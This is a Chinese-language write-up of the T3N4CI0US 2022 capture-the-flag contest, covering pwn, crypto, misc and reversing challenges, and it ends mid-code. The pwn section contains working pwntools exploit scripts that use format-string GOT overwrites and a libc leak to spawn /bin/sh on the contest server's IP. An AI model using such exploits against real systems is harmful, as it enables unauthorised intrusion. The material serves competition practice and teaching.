-
[T3N4CI0US 2022] 一个韩国比赛
好多都作不出来,老外的思路就是不一样。看看有谁有结果
-
pwnable
-
CheckCheckCheck
- 题目
V3Y4GK0FW{EccrEsXpvtjIcdc} 后来改为 V3Y4GK0FW{EccrEs_Xpvtj_Icdc} -
思路,显然题目的flag壳是T3N4CI0US,这里是+2,+11,+4的循环,不过提交总是不正确,后来他把题目加了下划线。不过这题跟frech是一样的,也不是pwn题
- c = 'VYGKFWEccrEsXpvtjIcdc'
- a = c.upper()
- out = ''
- for i in range(0, len(a), 3):
- out += chr(((ord(a[i]) - ord('A') -2 )%26) + ord('A'))
- out += chr(((ord(a[i+1]) - ord('A') -11 )%26) + ord('A'))
- out += chr(((ord(a[i+2]) - ord('A') -4 )%26) + ord('A'))
- print(c)
- print(out)
- b = ''
- for i in range(len(a)):
- if c[i].isupper():
- b += out[i]
- else:
- b += out[i].lower()
- print(b)
- #T3N4CI0US{CrypToVerryEasy}
- #T3N4CI0US{CrypTo_Verry_Easy}
- 题目
-
prison
- 题目原码
- int __cdecl main(int argc, const char **argv, const char **envp)
- {
- char s[10]; // [rsp+6h] [rbp-Ah] BYREF
- puts("It's up to you when you come in, but not when you go out");
- gets(s, argv);
- puts(s);
- return 0;
- }
显然这是个溢出的题,正常情况下先溢出后写pop_rdi,got_puts,plt_puts,_start取得libc再来一次pop_rdi,bin_sh,system就行了。可这里有个问题,输入后是没有反应的,为得到反应作了无数次尝试,最后发现后边需要两个回车\n\n或者很近的两个回车\nabcd\n而当第二次循环就直接over了,后来题目显示有问题
- 题目原码
-
Patchcode
- 其实这里没有题目,nc过去以后是相shell可以直接cat home/ctf/flag,提交也显示正确并不能再提交。但不显示分数
-
noooooob
- 这是个ret2system的题有printf漏洞和system函数,got表没有保护,PIE没开
- int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
- {
- char buf[264]; // [rsp+0h] [rbp-110h] BYREF
- unsigned __int64 v4; // [rsp+108h] [rbp-8h]
- v4 = __readfsqword(0x28u);
- read(0, buf, 0x100uLL);
- printf(buf);
- exit(0);
- }
解法也简单,直接把got['exit']的值改为shell
- from pwn import *
- #p = process('./prob')
- p = remote('34.64.203.138', 10002)
- elf = ELF('./prob')
- context(arch='amd64', log_level='debug')
- #gdb.attach(p, "b*0x400630")
- #pause()
- payload = b"%64c%10$hn%1415c%9$hnxxx"+p64(elf.got['exit'])+ p64(elf.got['exit']+2)
- #payload = fmtstr_payload(7, {elf.got['exit'] : elf.sym['system']+4})
- p.sendline( payload )
- #p.recvuntil(b'xx')
- sleep(1)
- p.interactive()
- 这是个ret2system的题有printf漏洞和system函数,got表没有保护,PIE没开
-
Trigger Master
- 这个跟上题一样,只是没有了system函数
- int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
- {
- char buf[264]; // [rsp+0h] [rbp-110h] BYREF
- unsigned __int64 v4; // [rsp+108h] [rbp-8h]
- v4 = __readfsqword(0x28u);
- read(0, buf, 0x100uLL);
- printf(buf);
- exit(0);
- }
思路是先把got_exit的值改为main同时漏洞一got[printf]的值,然后再把printf改为system并发个/bin/sh但问题与上边一样没有输出,需要大输入才能挤出一部分来,也没有实现,后来几乎所有的pwn题都报后台有问题就算了
- from pwn import *
- def conn(local=1):
- global p,libc_elf,one
- if local == 1:
- p = process('./prob')
- libc_elf = ELF('/home/shi/libc6_2.31-0ubuntu9.9/lib/x86_64-linux-gnu/libc.so.6')
- one = [0xe3afe, 0xe3b01, 0xe3b04]
- else:
- p = remote('34.64.203.138', 10003)
- libc_elf = ELF('/home/shi/libc6_2.31-0ubuntu9.9/lib/x86_64-linux-gnu/libc.so.6')
- one = [0xe3afe, 0xe3b01, 0xe3b04]
- def write(where, what):
- print(hex(where), hex(what))
- v0 = 8
- off = 16
- payload = '/bin/sh;'
- for i in range(8):
- v1 =what&0xff
- what >>=8
- v2 = (v1-v0)%0x100
- v0 = v1
- if v2 == 0:
- payload += "%"+ str(off+i)+"$hhn"
- else:
- payload += "%"+ str(v2) + "c%"+ str(off+i)+"$hhn"
- if what == 0:
- break
- payload = (payload+ '%4000c').ljust(0x50, 'A').encode()
- for i in range(8):
- payload += p64(where+i)
- #payload = payload.ljust(0x100, b'A')
- p.sendline(payload+ b'XXXX')
- elf = ELF('./prob')
- context(arch='amd64', log_level='debug')
- #0x400577
- conn(0)
- p.settimeout(5.0)
- #gdb.attach(p, 'b*0x4005c8')
- #pause()
- off = 6 + (0x7a8-0x5f0)//8
- #sleep(2)
- #payload = b"%5c%11$hhn%114c%10$hhn%12$s,".ljust(0x20,b'A')+flat(elf.got['exit'],elf.got['exit']+1, elf.got['printf'])
- #p.sendline( payload)
- write(elf.got['exit'], elf.sym['main'])
- #sleep(2)
- sleep(5)
- p.recvuntil(b'XXXX')
- p.sendline((b'%8$s%5000c'.ljust(16, b'A')+p64(elf.got['printf'])))
- sleep(5)
- libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc_elf.sym['printf']
- libc_elf.address = libc_base
- print('libc:',hex(libc_base))
- system = libc_elf.sym['system']
- write(elf.got['printf'], libc_base + one[2])
- sleep(5)
- p.recv()
- p.sendline(b'/bin/sh\x00')
- p.interactive()
- 这个跟上题一样,只是没有了system函数
-
-
MISC
-
find me
- misc题一个都没作出来,没有附后件,只有提示,感觉像脑筋急转弯
- hello pls find Dolpari
- flag format : T3N4CI0US{Site URL}
- misc题一个都没作出来,没有附后件,只有提示,感觉像脑筋急转弯
-
Find us
-
- Hi, can you find us?
- Go into a site somewhere and look for us!
-
-
Basic Number
-
- I'm going to code the file I gave you, and I'm going to code the number seven
- Enter the code with the print as flag
- format : T3N4CI0US{print????????}
-
-
Hard Number
-
- Complete this code so that the number 7 comes out
- Then insert the last line of the code into the flag
- #这个有附件是ipyb的看不懂
-
-
re They
- 有一堆图,提示是
About them!
- 有一堆图,提示是
-
-
Crypto
-
french
- 跟pwn那是一个题
- French Ciper
- V3Y4GK0FW{EccrEs_Xpvtj_Icdc}
- 跟pwn那是一个题
-
Before Porta arrives at the port!
- 摩尔斯码,key应该是给上一题的,French Cipher应该就是维吉尼亚密码,上题用这个key就能解
- Before Porta arrives at the port! Decryption is required to interpret this..
- ...-- -. ....- -.-. .. ----- ..- ... # --- .--- .- -.. .-.. -.. ..--.- ..- ..--.- .--. -.-- .--. ..--.- ...- ..--.- . ..-. --. --.. -..- --.. -..- #
- key = cle
解出来不对
- T3N4CI0US{OJADLD_U_PYP_V_EFGZXZX}
- T3N4CI0US{MYWBAZ_S_EUN_K_ADVVVOT}
- 摩尔斯码,key应该是给上一题的,French Cipher应该就是维吉尼亚密码,上题用这个key就能解
-
ed
-
- What is this?
- HcBBCkAREAbgq/xuoFjZWtnY4AAyQ0oplnp3n3pfX3VgXjhkE60PuqRH3DbxUb9PAA==
-
-
re
-
- Find the alphabet and number to fit in ().
- ╭──────────╮
- I H M () L A T P
- ╰──────────╯
- I = 7
- H = 6
- M = 7
- () = ()
- L = 15
- A = 15
- T = 38
- P = 16
- T3N4CI0US{Alphabet_Number}
-
-
ro
-
- [ W E = 360 ]
- [ S N S = 360 ]
- [ N E W S = ? ]
-
-
Shuuuung
-
- Can you find this password and escape?
- Find the password that means these.
- JEW LEE ETT, CHAR LEE, PAH PAH
- Replace spaces with _
-
-
one
-
- 26s + 8t = 2( == gcd(26,8))
- + 12345 for the correct answer
-
-
-
Reversing
-
Warmup
- 这个程序肯定是看不懂的,非常非常复杂,但原码里有flag
T3N4CI0US{773a_6d8c_c01fbc_f454646564_2_049eb4_3c2ad_852}
- 这个程序肯定是看不懂的,非常非常复杂,但原码里有flag
-
Rooftop
- 先md5再逆序再hex,看似简单,但md5这块逆不了
- int __cdecl main(int argc, const char **argv, const char **envp)
- {
- char s2[8]; // [rsp+10h] [rbp-30h] BYREF
- __int64 v5; // [rsp+18h] [rbp-28h]
- __int64 v6; // [rsp+20h] [rbp-20h]
- __int64 v7; // [rsp+28h] [rbp-18h]
- char v8; // [rsp+30h] [rbp-10h]
- if ( argc > 1 )
- {
- *(_QWORD *)s2 = 0LL;
- v5 = 0LL;
- v6 = 0LL;
- v7 = 0LL;
- v8 = 0;
- emmdee5(argv[1], (__int64)s2);
- printf("%s", s2);
- if ( !strcmp("55347092ad1b19f9021174038078e57a", s2) )
- printf("Flag: T3N4CI0US{%s}\n", argv[1]);
- else
- puts("Sorry..");
- return 0;
- }
- else
- {
- printf("Flag: %s
\n" , *argv); - return 1;
- }
- }
- int __fastcall emmdee5(const char *a1, __int64 a2)
- {
- __int64 v2; // rax
- int result; // eax
- __int64 v4[3]; // [rsp+10h] [rbp-20h] BYREF
- int i; // [rsp+2Ch] [rbp-4h]
- v4[0] = 0LL;
- v4[1] = 0LL;
- v2 = strlen(a1);
- MD5((__int64)a1, v2, (__int64)v4);
- result = esrever((const char *)v4); // 逆序
- for ( i = 0; i <= 15; ++i )
- result = sprintf((char *)(a2 + 2 * i), "%02x", *((unsigned __int8 *)v4 + i));
- return result;
- }
- 先md5再逆序再hex,看似简单,但md5这块逆不了
-
WHISEN
- 把flag的字符重新排了个序
- int __cdecl main(int argc, const char **argv, const char **envp)
- {
- char s1[40]; // [rsp+0h] [rbp-50h] BYREF
- char *s2; // [rsp+28h] [rbp-28h]
- char v6[26]; // [rsp+36h] [rbp-1Ah] BYREF
- qmemcpy(v6, "}40_0hIfUrC{S_4rrc0NT03k3T", sizeof(v6));
- s2 = (char *)malloc(0x1AuLL);
- printf("Enter the Password : ");
- __isoc99_scanf("%s", s2);
- s1[0] = v6[25];
- s1[1] = v6[22];
- s1[2] = v6[19];
- s1[3] = v6[14];
- s1[4] = v6[10];
- s1[5] = v6[6];
- s1[6] = v6[4];
- s1[7] = v6[8];
- s1[8] = v6[12];
- s1[9] = v6[11];
- s1[10] = v6[16];
- s1[11] = v6[18];
- s1[12] = v6[21];
- s1[13] = v6[20];
- s1[14] = v6[3];
- s1[15] = v6[7];
- s1[16] = v6[2];
- s1[17] = v6[15];
- s1[18] = v6[13];
- s1[19] = v6[5];
- s1[20] = v6[14];
- s1[21] = v6[17];
- s1[22] = v6[23];
- s1[23] = v6[24];
- s1[24] = v6[9];
- if ( !strncmp(s1, s2, 0x1AuLL) )
- printf("Success! You found the flag!\n%s\n", s1);
- else
- puts("Incorrect Password !");
- return 0;
- }
结果这个提交正确了
- v6 = "}40_0hIfUrC{S_4rrc0NT03k3T"
- s1 = [0]*25
- s1[0] = v6[25]
- s1[1] = v6[22]
- s1[2] = v6[19]
- s1[3] = v6[14]
- s1[4] = v6[10]
- s1[5] = v6[6]
- s1[6] = v6[4]
- s1[7] = v6[8]
- s1[8] = v6[12]
- s1[9] = v6[11]
- s1[10] = v6[16]
- s1[11] = v6[18]
- s1[12] = v6[21]
- s1[13] = v6[20]
- s1[14] = v6[3]
- s1[15] = v6[7]
- s1[16] = v6[2]
- s1[17] = v6[15]
- s1[18] = v6[13]
- s1[19] = v6[5]
- s1[20] = v6[14]
- s1[21] = v6[17]
- s1[22] = v6[23]
- s1[23] = v6[24]
- s1[24] = v6[9]
- print(s1)
- print(''.join(s1))
- #T3N4CI0US{r00T_f0r_h4ck3r}
- 把flag的字符重新排了个序
-
TLS
- 我感觉这是唯一有点难度的题32位,UPX壳,z3一把梭,但提交不正确不知道哪错了
- fgets(Buffer, 256, Stream);
- v6 = ftell(Stream);
- fclose(Stream);
- if ( v6 == 19 )
- {
- v8[0] = (Buffer[11] * Buffer[11] - Buffer[11]) ^ (Buffer[0]
- + Buffer[18] * Buffer[12] * Buffer[17]
- + Buffer[5]
- + Buffer[0] * Buffer[16]
- - Buffer[14] * Buffer[1]) ^ 0x59;
- v8[1] = (Buffer[1] + Buffer[7] * Buffer[0] - Buffer[18] * Buffer[0] - Buffer[5]) ^ (Buffer[12]
- + Buffer[4] * Buffer[2]) ^ (Buffer[1] - Buffer[10] * Buffer[3]) ^ 0x7B;
- v8[2] = Buffer[11] ^ Buffer[8] ^ (Buffer[1] * Buffer[15]
- + Buffer[3] * Buffer[17]
- - Buffer[14]
- - Buffer[5]
- - Buffer[1]
- - Buffer[6]) ^ Buffer[3] ^ 0xC0;
- v8[3] = Buffer[9] ^ Buffer[5] ^ (Buffer[8] + Buffer[3] + Buffer[4] + Buffer[18] - Buffer[4] * Buffer[6]) ^ Buffer[15] ^ 0xAD;
- v8[4] = Buffer[12] ^ (Buffer[18] * Buffer[18] * Buffer[4] - Buffer[7] - Buffer[3]) ^ (Buffer[3]
- - Buffer[17]
- - Buffer[1]) ^ (Buffer[5] + Buffer[7] * Buffer[18]) ^ 0x55;
- v8[5] = (Buffer[10] + Buffer[3] * Buffer[14] - Buffer[15]) ^ (Buffer[8] + Buffer[14] - Buffer[11]) ^ Buffer[3] ^ 0x9C;
- v8[6] = Buffer[6] ^ Buffer[3] ^ Buffer[9] ^ (Buffer[2] * Buffer[5] * Buffer[17]
- + Buffer[11]
- + Buffer[17]
- - Buffer[15]
- - Buffer[5]
- - Buffer[7]) ^ 0x12;
- v8[7] = (Buffer[8] * Buffer[9] * Buffer[17]) ^ (Buffer[5] * Buffer[2] * Buffer[16] - Buffer[5] - Buffer[7]) ^ Buffer[16] ^ 0x34;
- v8[8] = Buffer[4] ^ Buffer[7] ^ Buffer[6] ^ (Buffer[16] * Buffer[4] - Buffer[7] * Buffer[15]) ^ (Buffer[1] * Buffer[10] * Buffer[1] * Buffer[17]) ^ Buffer[10] ^ 0x53;
- v8[9] = (Buffer[12] * Buffer[3]) ^ (Buffer[5] * Buffer[9]
- + Buffer[13]
- + Buffer[2]
- + Buffer[15] * Buffer[9]
- - Buffer[1]
- - Buffer[14] * Buffer[3]) ^ 0x50;
- v8[10] = (Buffer[5] * Buffer[7]) ^ Buffer[11] ^ (Buffer[12] - Buffer[15]) ^ (Buffer[0] + Buffer[9]) ^ (Buffer[7] - Buffer[1] * Buffer[3]) ^ 0x13;
- v8[11] = (Buffer[10] + Buffer[2] * Buffer[17]) ^ (Buffer[16]
- + Buffer[15] * Buffer[6]
- + Buffer[11]
- + Buffer[9]
- - Buffer[4]) ^ Buffer[5] ^ 0x62;
- v8[12] = (Buffer[6] + Buffer[7] - Buffer[5] - Buffer[9] - Buffer[5] * Buffer[12]) ^ Buffer[16] ^ (Buffer[8] * Buffer[14]) ^ 0x9B;
- v8[13] = Buffer[0] ^ (Buffer[16] + Buffer[9] + Buffer[5] * Buffer[17] - Buffer[0]) ^ (Buffer[18]
- + Buffer[6]
- + Buffer[16]) ^ 0x85;
- v8[14] = Buffer[3] ^ (Buffer[11] + Buffer[6]) ^ (Buffer[2] * Buffer[14] * Buffer[0]) ^ Buffer[7] ^ (Buffer[15] - Buffer[2]) ^ 0x73;
- v8[15] = (Buffer[2] * Buffer[18] + Buffer[10]) ^ (Buffer[5]
- + Buffer[14] * Buffer[16]
- - Buffer[8]
- - Buffer[6]
- - Buffer[17]) ^ (Buffer[0] * Buffer[7] + Buffer[9]) ^ 0x3D;
- v8[16] = (Buffer[14] + Buffer[7] - Buffer[8] - Buffer[6] - Buffer[8]) ^ Buffer[2] ^ Buffer[16] ^ 0xD0;
- v8[17] = (Buffer[0] * Buffer[17] * Buffer[3] * Buffer[2]) ^ (Buffer[13] - Buffer[8] - Buffer[10] * Buffer[5]) ^ (Buffer[12] + Buffer[0]) ^ (Buffer[11] + Buffer[10]) ^ 0xF2;
- v8[18] = (Buffer[5] * Buffer[15] * Buffer[8] + Buffer[7] * Buffer[8] + Buffer[15] - Buffer[1] - Buffer[12]) ^ 0x92;
- v8[19] = (Buffer[6] * Buffer[0]) ^ (Buffer[12] * Buffer[14]
- + Buffer[11]
- + Buffer[1]
- - Buffer[9] * Buffer[16]
- - Buffer[18]
- - Buffer[9]) ^ 0x43;
- v8[20] = (Buffer[0] + Buffer[11]) ^ (Buffer[17] + Buffer[8] * Buffer[3] - Buffer[7]) ^ (Buffer[7]
- + Buffer[7] * Buffer[16]
- + Buffer[0]
- - Buffer[10]) ^ 0x18;
- v8[21] = Buffer[9] ^ (Buffer[9] + Buffer[8] * Buffer[9] - Buffer[17]) ^ (Buffer[2]
- * Buffer[4]
- * Buffer[1]
- * Buffer[15]
- * Buffer[17]
- * Buffer[5]) ^ 0x26;
- v8[22] = Buffer[8] ^ (Buffer[5] * Buffer[15] - Buffer[11] * Buffer[17] * Buffer[2]) ^ Buffer[18] ^ 0x9B;
- v8[23] = (Buffer[1] * Buffer[17] * Buffer[4]) ^ (Buffer[5] + Buffer[11] * Buffer[11]) ^ (Buffer[2] - Buffer[7]) ^ (Buffer[14] * Buffer[9]) ^ Buffer[11] ^ 0x38;
- v8[24] = (Buffer[4] * Buffer[11] * Buffer[12] - Buffer[1]) ^ (Buffer[14] * Buffer[5]) ^ Buffer[14] ^ Buffer[12] ^ 0x7F;
- v8[25] = Buffer[10] ^ (Buffer[10] - Buffer[16]) ^ (Buffer[9] * Buffer[15]) ^ 0x40;
- v8[26] = (Buffer[12] * Buffer[8]) ^ (Buffer[13] * Buffer[13]) ^ (Buffer[2] * Buffer[1] - Buffer[11]) ^ (Buffer[3] + Buffer[10]) ^ 0x12;
- v8[27] = (Buffer[6] * Buffer[14]) ^ Buffer[17] ^ (Buffer[18] * Buffer[2] + Buffer[4]) ^ 0x7E;
- v8[28] = (Buffer[10] + Buffer[16]) ^ (Buffer[8] * Buffer[11] + Buffer[15]) ^ Buffer[13] ^ (Buffer[4] * Buffer[15]
- - Buffer[8]) ^ 0x7F;
- v8[29] = (Buffer[1] + Buffer[10]) ^ (Buffer[6]
- + Buffer[6]
- + Buffer[4]
- + Buffer[0]
- + Buffer[12]
- + Buffer[7] * Buffer[5]
- - Buffer[2]) ^ 0xDF;
- v8[30] = (Buffer[9] * Buffer[0] * Buffer[5] * Buffer[1] - Buffer[1]) ^ Buffer[14] ^ (Buffer[9]
- + Buffer[6]
- - Buffer[4]) ^ 0xF4;
- v8[31] = (Buffer[5] * Buffer[0] * Buffer[4] + Buffer[7]) ^ (Buffer[5] * Buffer[6] * Buffer[7]) ^ Buffer[11] ^ Buffer[9] ^ 0x53;
- v8[32] = (Buffer[12] - Buffer[9]) ^ (Buffer[10] - Buffer[1]) ^ Buffer[2] ^ 0x50;
- v8[33] = (Buffer[8] - Buffer[10]) ^ (Buffer[7] + Buffer[3] - Buffer[0]) ^ (Buffer[13] * Buffer[0] * Buffer[18]
- - Buffer[15]) ^ 0xE3;
- v8[34] = (Buffer[3] + Buffer[1] - Buffer[15] - Buffer[2] - Buffer[0]) ^ (Buffer[5] - Buffer[4]) ^ Buffer[10] ^ 0xCF;
- v8[35] = (Buffer[10] * Buffer[8] * Buffer[6] * Buffer[11] * Buffer[11] * Buffer[1]) ^ (Buffer[13] * Buffer[18]
- + Buffer[5]) ^ 0x98;
- Text[0] = v8[rand() % 2];
- Text[2] = v8[rand() % 2 + 4];
- Text[3] = v8[rand() % 2 + 6];
- LOBYTE(v15) = v8[rand() % 2 + 16];
- BYTE1(v14) = v8[11 - rand() % 2];
- HIBYTE(v14) = v8[rand() % 2 + 14];
- LOBYTE(v14) = v8[rand() % 2 + 8];
- BYTE2(v14) = v8[13 - rand() % 2];
- Text[1] = v8[3 - rand() % 2];
- HIBYTE(v15) = 0;
- Caption[0] = v8[rand() % 2 + 18];
- Caption[1] = v8[rand() % 2 + 20];
- Caption[2] = v8[rand() % 2 + 22];
- Caption[3] = v8[rand() % 2 + 24];
- LOBYTE(v11) = v8[rand() % 2 + 26];
- BYTE1(v11) = v8[rand() % 2 + 28];
- BYTE2(v11) = 79;
- HIBYTE(v11) = v8[rand() % 2 + 32];
- v12 = (unsigned __int8)v8[rand() % 2 + 34];
- MessageBoxA(0, Text, Caption, 0);
提交不正确的程序
- Caption = b'T3N4CI0US'
- Text = b'CoNGRAtS!'
- from z3 import *
- Buffer = [BitVec(f'Buffer_{i}',8) for i in range(19)]
- v8 = [0]*36
- v8[0] = (Buffer[11] * Buffer[11] - Buffer[11]) ^ (Buffer[0] + Buffer[18] * Buffer[12] * Buffer[17] + Buffer[5] + Buffer[0] * Buffer[16] - Buffer[14] * Buffer[1]) ^ 0x59;
- v8[1] = (Buffer[1] + Buffer[7] * Buffer[0] - Buffer[18] * Buffer[0] - Buffer[5]) ^ (Buffer[12] + Buffer[4] * Buffer[2]) ^ (Buffer[1] - Buffer[10] * Buffer[3]) ^ 0x7B;
- v8[2] = Buffer[11] ^ Buffer[8] ^ (Buffer[1] * Buffer[15] + Buffer[3] * Buffer[17] - Buffer[14] - Buffer[5] - Buffer[1] - Buffer[6]) ^ Buffer[3] ^ 0xC0;
- v8[3] = Buffer[9] ^ Buffer[5] ^ (Buffer[8] + Buffer[3] + Buffer[4] + Buffer[18] - Buffer[4] * Buffer[6]) ^ Buffer[15] ^ 0xAD;
- v8[4] = Buffer[12] ^ (Buffer[18] * Buffer[18] * Buffer[4] - Buffer[7] - Buffer[3]) ^ (Buffer[3] - Buffer[17] - Buffer[1]) ^ (Buffer[5] + Buffer[7] * Buffer[18]) ^ 0x55;
- v8[5] = (Buffer[10] + Buffer[3] * Buffer[14] - Buffer[15]) ^ (Buffer[8] + Buffer[14] - Buffer[11]) ^ Buffer[3] ^ 0x9C;
- v8[6] = Buffer[6] ^ Buffer[3] ^ Buffer[9] ^ (Buffer[2] * Buffer[5] * Buffer[17] + Buffer[11] + Buffer[17] - Buffer[15] - Buffer[5] - Buffer[7]) ^ 0x12;
- v8[7] = (Buffer[8] * Buffer[9] * Buffer[17]) ^ (Buffer[5] * Buffer[2] * Buffer[16] - Buffer[5] - Buffer[7]) ^ Buffer[16] ^ 0x34;
- v8[8] = Buffer[4] ^ Buffer[7] ^ Buffer[6] ^ (Buffer[16] * Buffer[4] - Buffer[7] * Buffer[15]) ^ (Buffer[1] * Buffer[10] * Buffer[1] * Buffer[17]) ^ Buffer[10] ^ 0x53;
- v8[9] = (Buffer[12] * Buffer[3]) ^ (Buffer[5] * Buffer[9] + Buffer[13] + Buffer[2] + Buffer[15] * Buffer[9] - Buffer[1] - Buffer[14] * Buffer[3]) ^ 0x50;
- v8[10] = (Buffer[5] * Buffer[7]) ^ Buffer[11] ^ (Buffer[12] - Buffer[15]) ^ (Buffer[0] + Buffer[9]) ^ (Buffer[7] - Buffer[1] * Buffer[3]) ^ 0x13;
- v8[11] = (Buffer[10] + Buffer[2] * Buffer[17]) ^ (Buffer[16] + Buffer[15] * Buffer[6] + Buffer[11] + Buffer[9] - Buffer[4]) ^ Buffer[5] ^ 0x62;
- v8[12] = (Buffer[6] + Buffer[7] - Buffer[5] - Buffer[9] - Buffer[5] * Buffer[12]) ^ Buffer[16] ^ (Buffer[8] * Buffer[14]) ^ 0x9B;
- v8[13] = Buffer[0] ^ (Buffer[16] + Buffer[9] + Buffer[5] * Buffer[17] - Buffer[0]) ^ (Buffer[18] + Buffer[6] + Buffer[16]) ^ 0x85;
- v8[14] = Buffer[3] ^ (Buffer[11] + Buffer[6]) ^ (Buffer[2] * Buffer[14] * Buffer[0]) ^ Buffer[7] ^ (Buffer[15] - Buffer[2]) ^ 0x73;
- v8[15] = (Buffer[2] * Buffer[18] + Buffer[10]) ^ (Buffer[5] + Buffer[14] * Buffer[16] - Buffer[8] - Buffer[6] - Buffer[17]) ^ (Buffer[0] * Buffer[7] + Buffer[9]) ^ 0x3D;
- v8[16] = (Buffer[14] + Buffer[7] - Buffer[8] - Buffer[6] - Buffer[8]) ^ Buffer[2] ^ Buffer[16] ^ 0xD0;
- v8[17] = (Buffer[0] * Buffer[17] * Buffer[3] * Buffer[2]) ^ (Buffer[13] - Buffer[8] - Buffer[10] * Buffer[5]) ^ (Buffer[12] + Buffer[0]) ^ (Buffer[11] + Buffer[10]) ^ 0xF2;
- v8[18] = (Buffer[5] * Buffer[15] * Buffer[8] + Buffer[7] * Buffer[8] + Buffer[15] - Buffer[1] - Buffer[12]) ^ 0x92;
- v8[19] = (Buffer[6] * Buffer[0]) ^ (Buffer[12] * Buffer[14] + Buffer[11] + Buffer[1] - Buffer[9] * Buffer[16] - Buffer[18] - Buffer[9]) ^ 0x43;
- v8[20] = (Buffer[0] + Buffer[11]) ^ (Buffer[17] + Buffer[8] * Buffer[3] - Buffer[7]) ^ (Buffer[7] + Buffer[7] * Buffer[16] + Buffer[0] - Buffer[10]) ^ 0x18;
- v8[21] = Buffer[9] ^ (Buffer[9] + Buffer[8] * Buffer[9] - Buffer[17]) ^ (Buffer[2] * Buffer[4] * Buffer[1] * Buffer[15] * Buffer[17] * Buffer[5]) ^ 0x26;
- v8[22] = Buffer[8] ^ (Buffer[5] * Buffer[15] - Buffer[11] * Buffer[17] * Buffer[2]) ^ Buffer[18] ^ 0x9B;
- v8[23] = (Buffer[1] * Buffer[17] * Buffer[4]) ^ (Buffer[5] + Buffer[11] * Buffer[11]) ^ (Buffer[2] - Buffer[7]) ^ (Buffer[14] * Buffer[9]) ^ Buffer[11] ^ 0x38;
- v8[24] = (Buffer[4] * Buffer[11] * Buffer[12] - Buffer[1]) ^ (Buffer[14] * Buffer[5]) ^ Buffer[14] ^ Buffer[12] ^ 0x7F;
- v8[25] = Buffer[10] ^ (Buffer[10] - Buffer[16]) ^ (Buffer[9] * Buffer[15]) ^ 0x40;
- v8[26] = (Buffer[12] * Buffer[8]) ^ (Buffer[13] * Buffer[13]) ^ (Buffer[2] * Buffer[1] - Buffer[11]) ^ (Buffer[3] + Buffer[10]) ^ 0x12;
- v8[27] = (Buffer[6] * Buffer[14]) ^ Buffer[17] ^ (Buffer[18] * Buffer[2] + Buffer[4]) ^ 0x7E;
- v8[28] = (Buffer[10] + Buffer[16]) ^ (Buffer[8] * Buffer[11] + Buffer[15]) ^ Buffer[13] ^ (Buffer[4] * Buffer[15] - Buffer[8]) ^ 0x7F;
- v8[29] = (Buffer[1] + Buffer[10]) ^ (Buffer[6] + Buffer[6] + Buffer[4] + Buffer[0] + Buffer[12] + Buffer[7] * Buffer[5] - Buffer[2]) ^ 0xDF;
- v8[30] = (Buffer[9] * Buffer[0] * Buffer[5] * Buffer[1] - Buffer[1]) ^ Buffer[14] ^ (Buffer[9] + Buffer[6] - Buffer[4]) ^ 0xF4;
- v8[31] = (Buffer[5] * Buffer[0] * Buffer[4] + Buffer[7]) ^ (Buffer[5] * Buffer[6] * Buffer[7]) ^ Buffer[11] ^ Buffer[9] ^ 0x53;
- v8[32] = (Buffer[12] - Buffer[9]) ^ (Buffer[10] - Buffer[1]) ^ Buffer[2] ^ 0x50;
- v8[33] = (Buffer[8] - Buffer[10]) ^ (Buffer[7] + Buffer[3] - Buffer[0]) ^ (Buffer[13] * Buffer[0] * Buffer[18] - Buffer[15]) ^ 0xE3;
- v8[34] = (Buffer[3] + Buffer[1] - Buffer[15] - Buffer[2] - Buffer[0]) ^ (Buffer[5] - Buffer[4]) ^ Buffer[10] ^ 0xCF;
- v8[35] = (Buffer[10] * Buffer[8] * Buffer[6] * Buffer[11] * Buffer[11] * Buffer[1]) ^ (Buffer[13] * Buffer[18] + Buffer[5]) ^ 0x98;
- s = Solver()
- for i in range(19):
- s.add(Buffer[i]>=0x20)
- '''
- Text[0] = v8[rand() % 2];
- Text[2] = v8[rand() % 2 + 4];
- Text[3] = v8[rand() % 2 + 6];
- LOBYTE(v15) = v8[rand() % 2 + 16];
- BYTE1(v14) = v8[11 - rand() % 2];
- HIBYTE(v14) = v8[rand() % 2 + 14];
- LOBYTE(v14) = v8[rand() % 2 + 8];
- BYTE2(v14) = v8[13 - rand() % 2];
- Text[1] = v8[3 - rand() % 2];
- HIBYTE(v15) = 0;
- '''
- #
- r = '10111100110101100000101100011110001110101111010010'
- s.add(v8[0 + int(r[0])] == Text[0])
- s.add(v8[4 + int(r[1])] == Text[2])
- s.add(v8[6 + int(r[2])] == Text[3])
- s.add(v8[16 + int(r[3])] == Text[8])
- s.add(v8[11 - int(r[4])] == Text[5])
- s.add(v8[14 + int(r[5])] == Text[7])
- s.add(v8[8 + int(r[6])] == Text[4])
- s.add(v8[12 + int(r[7])] == Text[6])
- s.add(v8[2 + int(r[8])] == Text[1])
- '''
- Caption[0] = v8[rand() % 2 + 18];
- Caption[1] = v8[rand() % 2 + 20];
- Caption[2] = v8[rand() % 2 + 22];
- Caption[3] = v8[rand() % 2 + 24];
- LOBYTE(v11) = v8[rand() % 2 + 26];
- BYTE1(v11) = v8[rand() % 2 + 28];
- BYTE2(v11) = 79;
- HIBYTE(v11) = v8[rand() % 2 + 32];
- v12 = (unsigned __int8)v8[rand() % 2 + 34];
- '''
- s.add(v8[18 + int(r[9])] == Caption[0])
- s.add(v8[20 + int(r[10])] == Caption[1])
- s.add(v8[22 + int(r[11])] == Caption[2])
- s.add(v8[24 + int(r[12])] == Caption[3])
- s.add(v8[26 + int(r[13])] == Caption[4])
- s.add(v8[28 + int(r[14])] == Caption[5])
- s.add(v8[32 + int(r[15])] == Caption[7])
- s.add(v8[34 + int(r[16])] == Caption[8])
- s.check()
- d = s.model()
- for i in range(19):
- print(chr(d[Buffer[i]].as_long()), end='')
- #i7's_zer0_n0t_B19_O
- #T3N4CI0US{i7's_zer0_n0t_B19_O}
题目提示
Make the MessageBox print 'CoNGRAtS!' in text and 'T3N4CI0US' in caption! Example: MessageBox.jpg (with file data, no program patches are allowed) flag format is T3N4CI0US{FileData}
- 我感觉这是唯一有点难度的题32位,UPX壳,z3一把梭,但提交不正确不知道哪错了
-
Swood
-
- int __cdecl main(int argc, const char **argv, const char **envp)
- {
- char s1[48]; // [rsp+10h] [rbp-30h] BYREF
- if ( argc > 1 )
- {
- strcpy(s1, "da39a3ee5e6b4b0d3255bfef95601890afd80709");
- if ( !strncmp(s1, argv[1], 0x28uLL) )
- {
- puts("Correect password!");
- return 0;
- }
- else
- {
